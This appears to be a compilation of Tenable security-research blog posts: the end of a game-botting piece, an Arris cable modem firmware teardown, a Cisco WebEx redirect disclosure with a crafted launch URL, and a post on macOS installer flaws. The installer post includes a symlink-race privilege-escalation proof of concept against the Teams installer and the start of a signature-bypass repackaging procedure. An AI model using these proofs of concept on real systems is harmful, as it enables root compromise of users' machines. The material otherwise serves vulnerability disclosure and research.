What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.


New World’s Botting Problem was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

ARRIS CABLE MODEM TEARDOWN

8 September 2021 at 13:03

Picked up one of these a little while back at the behest of a good friend.

https://www.surfboard.com/globalassets/surfboard-new/products/sb8200/sb8200-pro-detail-header-hero-1.png

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.

THE HARDWARE

There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.

THE FIRMWARE

Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat

PARSING THE FIRMWARE

Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd

Jackpot.

Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on “brcmnand.1”:
0x000000000000–0x000000620000 : “flash1.kernel0”
0x000000620000–0x000000c40000 : “flash1.kernel1”
0x000000c40000–0x000001fa0000 : “flash1.cm0”
0x000001fa0000–0x000003300000 : “flash1.cm1”
0x000003300000–0x000005980000 : “flash1.rg0”
0x000005980000–0x000008000000 : “flash1.rg1”
0x000000000000–0x000008000000 : “flash1”
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on “spi32766.0”:
0x000000000000–0x000000100000 : “flash0.bolt”
0x000000100000–0x000000120000 : “flash0.macadr”
0x000000120000–0x000000140000 : “flash0.nvram”
0x000000140000–0x000000160000 : “flash0.nvram1”
0x000000160000–0x000000180000 : “flash0.devtree0”
0x000000180000–0x0000001a0000 : “flash0.devtree1”
0x0000001a0000–0x000000200000 : “flash0.cmnonvol0”
0x000000200000–0x000000260000 : “flash0.cmnonvol1”
0x000000260000–0x000000330000 : “flash0.rgnonvol0”
0x000000330000–0x000000400000 : “flash0.rgnonvol1”
0x000000000000–0x000000400000 : “flash0”

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=0x2680000 skip=0x5980000

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

This hints that we are likely looking at an adjacent layout. The following python script will handle stripping the spare data out of our dump.

import sys
data_area = 512
spare = 16
combined = data_area + spare
with open(‘rg1’, ‘rb’) as f:
dump = f.read()
count = int(len(dump) / combined)
out = b’’
for i in range(count):
out = out + dump[i*block : i*combined + data_area]
with open(‘rg1_stripped’, ‘wb’) as f:
f.write(out)

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
dump = f.read()
with open('rg1_little', 'wb') as f:
# Page size is 2048
block = 2048
nblocks = int(len(dump) / block)

# Iterate over blocks, byte swap each 32-bit value
for i in range(0, nblocks):
current_block = dump[i*block:(i+1)*block]
j = 0
while j < len(current_block):
section = current_block[j:j+4]
f.write(section[::-1])
j = j + 4

Extract

Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs

Conclusion

Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!


ARRIS CABLE MODEM TEARDOWN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Cisco WebEx Universal Links Redirect

31 August 2021 at 15:56

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9\/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSW1OdmJXMXZiaUk2SUhzS0lDQWdJQ0FnSUNBaVJHVnNZWGxTWldScGNtVmpkQ0k2SUNKMGNuVmxJZ29nSUNBZ2ZTd0tJQ0FnSUNKM1pXSmxlQ0k2SUhzS0lDQWdJQ0FnSUNBaVNtOXBia1pwY25OMFFteGhZMnRNYVhOMElqb2dXd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJalF4TGpRaUxBb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lqUXhMalVpQ2lBZ0lDQWdJQ0FnWFFvZ0lDQWdmU3dLSUNBZ0lDSmxkbVZ1ZENJNklIc0tDaUFnSUNCOUxBb2odJQ0FnSW5SeVlXbHVhVzVuSWpvZ2V3b0tJQ0FnSUgwc0NpQWdJQ0FpYzNWd2NHOXlkQ0k2SUhzS0lDQWdJQ0FnSUNBaVIzQmpRMjl0Y0c5dVpXNTBUbUZ0WlNJNklDSkRhWE5qYnlCWFpXSmxlQ0JUZFhCd2IzSjBMbUZ3Y0NJS0lDQWdJSDBLZlFvPSIsInVsaW5rIjoiYUhSMGNITTZMeTl0WldWME1URXpMbmRsWW1WNExtTnZiUzkzWW5odGFuTXZhbTlwYm5ObGNuWnBZMlV2YzJsMFpYTXZiV1ZsZERFeE15OXRaV1YwYVc1bkwzTmxkSFZ3ZFc1cGRtVnljMkZzYkdsdWEzTS9jMmwwWlhWeWJEMXRaV1YwTVRFekptMWxaWFJwYm1kclpYazlNVGd5TWpnMk5qTTBOeVpqYjI1MFpYaDBTVVE5YzJWMGRYQjFibWwyWlhKellXeHNhVzVyWHpBek16azFZamN3WmpjMU1UUmpPR1U0TTJJek5qZ3lNV1V4T1dZd05UVXlYekUyTWpNNU5UQTBNVGMzTURZbWRHOXJaVzQ5VTBSS1ZGTjNRVUZCUVZoWVlqVkVMVTFtTUZKZlVXcHFka3BTWkdacmJFRmFZVzkxY1Voa1RYbHVjSFppWHpCS1IyeFJhVEYzTWlac1lXNW5kV0ZuWlQxbGJsOVZVdz09IiwidXRvZ2dsZSI6IjEiLCJtZSI6IjEiLCJqZnYiOiIxIiwidGlmIjoiUEQ5NGJXd2dkbVZ5YzJsdmJqMGlNUzR3SWlCbGJtTnZaR2x1WnowaVZWUkdMVGdpUHo0S1BGUmxiR1ZOWlhSeWVVbHVabTgrUEUxbGRISnBZM05GYm1GaWJHVStNVHd2VFdWMGNtbGpjMFZ1WVdKc1pUNDhUV1YwY21samMxVlNURDVvZEhSd2N6b3ZMM1J6WVRNdWQyVmlaWGd1WTI5dEwyMWxkSEpwWXk5Mk1Ud3ZUV1YwY21samMxVlNURDQ4VFdWMGNtbGpjMUJoY21GdFpYUmxjbk0rUEUxbGRISnBZM05VYVdOclpYUStVbnBJTHk5M1FVRkJRVmhqUkhCSlFTOVFja0ZWSzJGeWFXTnliVEF3TlRjMVpubFZUM0EwVFc4d1NrTnpWVXh0V2pKR1IyTkJQVDA4TDAxbGRISnBZM05VYVdOclpYUStQRU52Ym1aSlJENHhPVGN4T1RnME5UYzBNakkzTnpJek5EYzhMME52Ym1aSlJENDhVMmwwWlVsRVBqRTBNakkyTXpZeVBDOVRhWFJsU1VRK1BGUnBiV1ZUZEdGdGNENHhOakl6T0RZME1ERTNOekEzUEM5VWFXMWxVM1JoYlhBK1BFRlFVRTVoYldVK1UyVnpjMmx2Ymt0bGVUd3ZRVkJRVG1GdFpUNDhMMDFsZEhKcFkzTlFZWEpoYldWMFpYSnpQanhOWlhSeWFXTnpSVzVoWW14bFRXVmthV0ZSZFdGc2FYUjVSWFpsYm5RK01Ud3ZUV1YwY21samMwVnVZV0pzWlUxbFpHbGhVWFZoYkdsMGVVVjJaVzUwUGp3dlZHVnNaVTFsZEhKNVNXNW1iejQ9In0=

While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:

{“uuid”:”8e18fa93cd10432a907c94fb9d3a63e6",”cv”:”41.6.4.8",”cwsv”:”11,41,0604,210608,0",”st”:”MC”,”pv”:”T33_64UMC”,”cn”:”ATCONFUI.BUNDLE”,”flag”:33554432,”ejf”:”2",”cpp”:”ewogICAgImNvbW1vbiI6IHsKICAgICAgICAiRGVsYXlSZWRpcmVjdCI6ICJ0cnVlIgogICAgfSwKICAgICJ3ZWJleCI6IHsKICAgICAgICAiSm9pbkZpcnN0QmxhY2tMaXN0IjogWwogICAgICAgICAgICAgICAgIjQxLjQiLAogICAgICAgICAgICAgICAgIjQxLjUiCiAgICAgICAgXQogICAgfSwKICAgICJldmVudCI6IHsKCiAgICB9LAogICAgInRyYWluaW5nIjogewoKICAgIH0sCiAgICAic3VwcG9ydCI6IHsKICAgICAgICAiR3BjQ29tcG9uZW50TmFtZSI6ICJDaXNjbyBXZWJleCBTdXBwb3J0LmFwcCIKICAgIH0KfQo=”,”ulink”:”aHR0cHM6Ly9tZWV0MTEzLndlYmV4LmNvbS93YnhtanMvam9pbnNlcnZpY2Uvc2l0ZXMvbWVldDExMy9tZWV0aW5nL3NldHVwdW5pdmVyc2FsbGlua3M/c2l0ZXVybD1tZWV0MTEzJm1lZXRpbmdrZXk9MTgyMDIxMDYwOCZjb250ZXh0SUQ9c2V0dXB1bml2ZXJzYWxsaW5rXzNlNjNjZDFlODcyMzRlOTE4OWU2OWM2NjI2MDcxMzBiXzE2MjQwMjA4ODUwNTImdG9rZW49U0RKVFN3QUFBQVd4c0pGelhzSW1Da2l3aHQya2t4TE1WWFdJVFZpTTh4OWVnUWJlejVUaWhBMiZsYW5ndWFnZT1lbl9VUw==”,”utoggle”:”1",”me”:”1",”jfv”:”1",”tif”:”PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPFRlbGVNZXRyeUluZm8+PE1ldHJpY3NFbmFibGU+MTwvTWV0cmljc0VuYWJsZT48TWV0cmljc1VSTD5odHRwczovL3RzYTMud2ViZXguY29tL21ldHJpYy92MTwvTWV0cmljc1VSTD48TWV0cmljc1BhcmFtZXRlcnM+PE1ldHJpY3NUaWNrZXQ+UnpILy93QUFBQVVoVE5VSXhKcThuKzR4N0djY2c5S1NFRWFqVHZ2aDQrWkxLSmIzTnh3aElnPT08L01ldHJpY3NUaWNrZXQ+PENvbmZJRD4xOTczMDMyMzQxNzY1MTQ3NDE8L0NvbmZJRD48U2l0ZUlEPjE0MjI2MzYyPC9TaXRlSUQ+PFRpbWVTdGFtcD4xNjIzOTM0NDg1MDUyPC9UaW1lU3RhbXA+PEFQUE5hbWU+U2Vzc2lvbktleTwvQVBQTmFtZT48L01ldHJpY3NQYXJhbWV0ZXJzPjxNZXRyaWNzRW5hYmxlTWVkaWFRdWFsaXR5RXZlbnQ+MTwvTWV0cmljc0VuYWJsZU1lZGlhUXVhbGl0eUV2ZW50PjwvVGVsZU1ldHJ5SW5mbz4=”}

From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks?siteurl=meet113&meetingkey=1820210608&contextID=setupuniversallink_3e63cd1e87234e9189e69c662607130b_1624020885052&token=SDJTSwAAAAWxsJFzXsImCkiwht2kkxLMVXWITViM8x9egQbez5TihA2&language=en_US

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “reddit.com” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that a given attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to https://tenable.com:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSUNBZ0lDSmpiMjF0YjI0aU9pQjdDaUFnSUNBZ0lDQWdJa1JsYkdGNVVtVmthWEpsWTNRaU9pQWlabUZzYzJVaUNpQWdJQ0I5TEFvZ0lDQWdJbmRsWW1WNElqb2dld29nSUNBZ0lDQWdJQ0pLYjJsdVJtbHljM1JDYkdGamEweHBjM1FpT2lCYkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaU5ERXVOQ0lzQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FpTkRFdU5TSUtJQ0FnSUNBZ0lDQmRDaUFnSUNCOUxBb2dJQ0FnSW1WMlpXNTBJam9nZXdvS0lDQWdJSDBzQ2lBZ0lDQWlkSEpoYVc1cGJtY2lPaUI3Q2dvZ0lDQWdmU3dLSUNBZ0lDSnpkWEJ3YjNKMElqb2dld29nSUNBZ0lDQWdJQ0pIY0dORGIyMXdiMjVsYm5ST1lXMWxJam9nSWtOcGMyTnZJRmRsWW1WNElGTjFjSEJ2Y25RdVlYQndJZ29nSUNBZ2ZRb2dJQ0FnZlFvZ0lDQWciLCJ1bGluayI6ImFIUjBjSE02THk5MFpXNWhZbXhsTG1OdmJRPT0iLCJ1dG9nZ2xlIjoiMSIsIm1lIjoiMSIsImpmdiI6IjEiLCJ0aWYiOiJQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpVlZSR0xUZ2lQejQ4VkdWc1pVMWxkSEo1U1c1bWJ6NDhUV1YwY21samMwVnVZV0pzWlQ0d1BDOU5aWFJ5YVdOelJXNWhZbXhsUGp4TlpYUnlhV056VlZKTVBtaDBkSEJ6T2k4dmRITmhNeTUzWldKbGVDNWpiMjB2YldWMGNtbGpMM1l4UEM5TlpYUnlhV056VlZKTVBqeE5aWFJ5YVdOelVHRnlZVzFsZEdWeWN6NDhUV1YwY21samMxUnBZMnRsZEQ1U2VrZ3ZMM2RCUVVGQldHTkVjRWxCTDFCeVFWVXJZWEpwWTNKdE1EQTFOelZtZVZWUGNEUk5iekJLUTNOVlRHMWFNa1pIWTBFOVBUd3ZUV1YwY21samMxUnBZMnRsZEQ0OFEyOXVaa2xFUGpFNU56RTVPRFExTnpReU1qYzNNak0wTnp3dlEyOXVaa2xFUGp4VGFYUmxTVVErTVRReU1qWXpOakk4TDFOcGRHVkpSRDQ4VkdsdFpWTjBZVzF3UGpFMk1qTTROalF3TVRjM01EYzhMMVJwYldWVGRHRnRjRDQ4UVZCUVRtRnRaVDVUWlhOemFXOXVTMlY1UEM5QlVGQk9ZVzFsUGp3dlRXVjBjbWxqYzFCaGNtRnRaWFJsY25NK1BFMWxkSEpwWTNORmJtRmliR1ZOWldScFlWRjFZV3hwZEhsRmRtVnVkRDR4UEM5TlpYUnlhV056Ulc1aFlteGxUV1ZrYVdGUmRXRnNhWFI1UlhabGJuUStQQzlVWld4bFRXVjBjbmxKYm1adlBnPT0ifQ==

The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

Now, obviously, I want to emphasize that this flaw is relatively complex as it requires user interaction and is of relatively low impact. For starters, this attack already requires an attacker to trick a user into visiting a malicious link (providing a fake meeting invite via a custom domain for example) and then allowing WebEx to launch from their browser. In this case, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue due to no security boundary being crossed; that’s too silly for even me to report. In this case, however, there is a security boundary being crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame, but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)


Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

3 June 2021 at 13:02

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020–9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020–9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/”
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won’t spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon”;
done
# Run installer. Wait for the TeamUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020–9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil — expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
